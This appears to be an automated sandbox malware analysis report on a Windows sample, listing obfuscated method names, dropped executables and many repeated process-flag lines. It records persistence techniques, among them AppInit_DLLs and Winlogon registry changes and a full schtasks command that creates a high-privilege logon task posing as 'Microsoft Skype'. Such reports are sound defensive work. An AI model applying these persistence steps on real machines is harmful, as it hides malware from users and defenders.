Source: CVmkXJ7e0a.exe, XPUiTLDMwepV.cs	High entropy of concatenated method names: 'jpyBoyTWvpkAeV', 'BCFeRdbrvnOMjS', 'mzirOOXAIPM', 'bZkippQK', 'YLEJIyCOalkDZDk', 'mHYeCxOEZz', 'LEZWSIcNoe', 'GQVliecACWAQC', 'rfrbxzkJgrKAP', 'vwpwmEAIJR'
Source: CVmkXJ7e0a.exe, IgIWsrqHbBFTbcX.cs	High entropy of concatenated method names: 'MerJSSZWY', 'BzBHxrvpvDP', 'lIvMhCwBQkADxJ', 'TgpHlyYpr', 'TEOYmgUr', 'tjOGlXaWERy', 'JnfcJFvesMSEGNy', 'ddDfLcQcEaEjL', 'UYsHKQivdaYN', 'gQKzXZssaNTm'
Source: CVmkXJ7e0a.exe, SbKdALCrg.cs	High entropy of concatenated method names: 'HnNldmubpXhYs', 'WcenIOyKzmS', 'pjjvFmRqULCGjz', 'HledtjmGYhOjSkx', 'aSkxKstRvGCDLa', 'EIPrYVJZKDd', 'NrCzFXXbo', 'CoOrNhmgiuyKKaC', 'YSQsaughfZsHwg', 'yjEGachHbmdUiM'

Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe

File created: C:\Users\Public\Pictures\xdwdUpdate.exe

Jump to dropped file

Boot Survival

Allows loading of unsigned dll using appinit_dll

Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe

Registry value created: RequireSignedAppInit_DLLs 0

Creates an undocumented autostart registry key

Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows AppInit_DLLs	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows LoadAppInit_DLLs	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit	Jump to behavior

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\schtasks.exe SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Microsoft Skype" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe"

Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run chrome			Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run chrome			Jump to behavior

Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe

Key value created or modified: HKEY_CURRENT_USER\SOFTWARE EBC733B087E1C2F6305E43354FC0384F383A7697EC97D4C00BDDFA6EB9AE6BEB

Queries memory information (via WMI often done to detect virtual machines)

Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\schtasks.exe	Process information set: NOOPENFILEERRORBOX
